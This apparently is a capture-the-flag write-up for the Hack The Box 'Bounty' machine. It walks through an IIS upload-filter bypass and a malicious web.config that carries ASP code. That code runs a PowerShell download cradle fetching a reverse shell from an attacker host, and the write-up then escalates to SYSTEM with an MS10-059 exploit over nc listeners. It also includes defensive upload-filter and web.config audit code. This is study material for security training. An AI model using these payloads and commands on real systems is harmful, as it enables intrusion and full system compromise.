HTB - Bounty

Getting Root
The box only had port 80 open, which hosted an application that allows uploading files while blocking asp, aspx and a few other file extensions.
I was able to bypass the upload filter using a null byte (%00.jpg), but the application generated an error giving a clue about something related to web.config. After some research about web.config, I was able to find an article describing how to upload a web.config file with ASP code embedded, and I was able to get a shell.
For privilege escalation, I was able to get SYSTEM using MS10-059.
Tools used:
nmap, nikto, gobuster, nishang, windows-exploit-suggester.py
Nmap
# Nmap 7.80 scan initiated Sun Mar 8 22:08:29 2020 as: nmap -Pn -sC -sV -p 80 -oN nmap/Bounty_nmap.txt 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 8 22:08:50 2020 -- 1 IP address (1 host up) scanned in 21.20 seconds
# Nmap 7.80 scan initiated Sun Mar 8 22:08:50 2020 as: nmap -Pn -sU -oN nmap/Bounty.udp 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered
# Nmap done at Sun Mar 8 22:12:12 2020 -- 1 IP address (1 host up) scanned in 201.34 seconds
Enumerating HTTP
Port 80 just shows a picture. I saved the picture as merling.jpg and used strings, steghide and exiftool, but didn't find anything.

Nikto
Nothing much was found with Nikto:
nikto -host http://10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-03-08 22:18:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-03-08 22:24:28 (GMT-4) (344 seconds)
---------------------------------------------------------------------------
Gobuster
gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster/Bounty_gobuster.txt -t 40 -x asp,aspx,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.93
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: asp,aspx,html,txt
[+] Timeout: 10s
===============================================================
2020/03/08 22:24:47 Starting gobuster
===============================================================
/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
===============================================================
2020/03/08 22:44:08 Finished
===============================================================
Testing transfer.aspx
I tried uploading files with ASP and ASPX extensions and it failed, but when I uploaded the merling.jpg file it worked. Based on that, I used Burp proxy to intercept the request and used a null byte (%00) to attempt to bypass the upload filter.
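As an added example (my code, not the Bounty application's), here is a blocklist check of the kind the upload form appears to use, next to an allowlist check that also rejects double extensions such as shell.aspx.jpg. It assumes the server URL-decodes the submitted filename so %00 becomes a NUL byte; the blocklist and allowlist contents are constructed.

```python
# Added example (not the Bounty application's code): a blocklist upload check
# beside an allowlist check. Assumes the filename is URL-decoded server-side.
from urllib.parse import unquote

BLOCKED = {".asp", ".aspx", ".ashx", ".asmx"}          # constructed blocklist
ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}           # constructed allowlist
MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
         ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}


def weak_filter(filename: str) -> bool:
    """Naive check: look only at the text after the last dot and refuse a
    handful of server-side extensions. Returns True when the upload is accepted.
    A NUL in the name and an unlisted extension such as .config both slip through."""
    name = unquote(filename)                  # "%00" becomes a real NUL byte here
    ext = "." + name.rsplit(".", 1)[-1].lower()
    return ext not in BLOCKED


def strong_filter(filename: str, data: bytes) -> bool:
    """Allowlist check: no control bytes or path separators in the name, no
    .config names, every dotted segment must avoid the blocklist, the final
    extension must be allowed and the content must match that extension."""
    name = unquote(filename)
    if "\x00" in name or "/" in name or "\\" in name:
        return False
    lowered = name.lower()
    if lowered.endswith(".config"):
        return False
    parts = lowered.split(".")
    if len(parts) < 2 or any("." + p in BLOCKED for p in parts[1:]):
        return False
    ext = "." + parts[-1]
    return ext in ALLOWED and data.startswith(MAGIC[ext])


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 12        # constructed JPEG header
    for fn in ("shellie.aspx", "shellie.aspx%00.jpg", "web.config", "merling.jpg"):
        print(f"{fn:22} weak={weak_filter(fn)} strong={strong_filter(fn, jpeg)}")
```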

When I tried to execute the shellie.aspx file at http://10.10.10.93/UploadedFiles/shellie.aspx, I got the error below.

I had no idea what to do from here, so I googled "IIS 7.5 web.config exploit" and, to my surprise, I found the following link stating that we can actually upload a *.config file with ASP code and it would work.

Here is the link:
Explanation of web.config as quoted from the link above:
Web.config
What is a web.config file?
A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.
With a web.config file, you can control:
Database connection strings. Error behavior. Security.
web.config files are XML documents. ‘.config’ is not an extension like ‘.html’ or ‘.txt’.
Getting a Reverse Shell
The link I found on Google refers to the following link below for the code they used in order to get RCE.
I used the example code I found but with a few modifications:
# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <!-- route requests for *.config through the classic ASP ISAPI handler -->
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <!-- lift the default request-filtering rules that refuse to serve .config and web.config -->
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings>
  </appSettings>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("ping 10.10.14.3")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->
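From the defender's side, the file above changes three things in the config and hides ASP code after the root element. As an added example (my code, not from the writeup or the linked article), this audit flags each of those in an uploaded web.config; SAMPLE is a constructed input.

```python
# Added example (not from the writeup or the linked article): audit an
# uploaded web.config for the three changes the file above relies on and for
# content smuggled after the root element. SAMPLE is a constructed input.
import re
import xml.etree.ElementTree as ET

SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" />
    </handlers>
    <security><requestFiltering>
      <fileExtensions><remove fileExtension=".config" /></fileExtensions>
      <hiddenSegments><remove segment="web.config" /></hiddenSegments>
    </requestFiltering></security>
  </system.webServer>
</configuration>
<!--
<% Response.write("smuggled") %>
-->"""


def audit_web_config(text: str) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    # Only whitespace/comments may follow the root element; the ASP above hides there.
    m = re.search(r"</configuration>", text)
    if m and text[m.end():].strip():
        findings.append("content after </configuration>")
        text = text[:m.end()]
    try:
        root = ET.fromstring(text.encode("utf-8"))
    except ET.ParseError as exc:
        return findings + [f"unparseable XML: {exc}"]
    for add in root.iter("add"):
        path = add.get("path", "").lower()
        proc = add.get("scriptProcessor", "").lower()
        if path.endswith(".config") or proc.endswith("asp.dll"):
            findings.append(f"handler maps {path} to {proc}")
    for rm in root.iter("remove"):
        if rm.get("fileExtension", "").lower() == ".config":
            findings.append("unblocks .config in requestFiltering/fileExtensions")
        if rm.get("segment", "").lower() == "web.config":
            findings.append("unhides web.config in requestFiltering/hiddenSegments")
    return findings


if __name__ == "__main__":
    for finding in audit_web_config(SAMPLE):
        print("finding:", finding)
```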
Uploading the web.config file


I could also confirm this using tcpdump:
# tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
23:58:28.277292 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 1, length 40
23:58:28.277378 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 1, length 40
23:58:29.271690 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 2, length 40
23:58:29.271752 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 2, length 40
23:58:30.270135 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 3, length 40
23:58:30.270165 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 3, length 40
23:58:31.268337 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 4, length 40
23:58:31.268366 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 4, length 40
^C
8 packets captured
8 packets received by filter
0 packets dropped by kernel
I used the Nishang reverse PowerShell script and modified the web.config code as follows:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings>
  </appSettings>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(New-Object Net.WebClient).DownloadString('http://10.10.14.3/pwsh.ps1')")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->
Uploaded the new web.config file.
Executed it via http://10.10.10.93/UploadedFiles/web.config
Started the listener on port 8008 (I edited the Nishang reverse TCP script).
Got a shell as merlin.
Started a Python HTTP server
# To serve the Nishang reverse PowerShell script
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [09/Mar/2020 00:21:47] "GET /pwsh.ps1 HTTP/1.1" 200 -
# Listener to capture the shell
# rlwrap nc -lnvp 8008
listening on [any] 8008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\users\merlin\desktop> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 3/9/2020, 5:22:56 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,586 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,594 MB
Virtual Memory: In Use: 501 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
Privilege Escalation
I used Windows Exploit Suggester:
./windows-exploit-suggester.py -d 2020-03-06-mssb.xls -i sysinfo_bounty
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
I used MS10-059. A Google search for "MS10-059 github" takes you to the following link with an .exe executable.
Downloaded the executable to the target using certutil:
PS C:\users\merlin\documents> certutil -urlcache -f -split http://10.10.14.3/MS10-059.exe
Executing the exploit
PS C:\users\merlin\documents> .\MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->
Usage: Chimichurri.exe ipaddress port <BR>
Started a Listener
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
Got Reverse Shell as SYSTEM
# On the target box
PS C:\users\merlin\documents> .\MS10-059.exe 10.10.14.3 9002
# On my Kali box
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\users\merlin\documents>whoami
whoami
nt authority\system
C:\users\merlin\documents>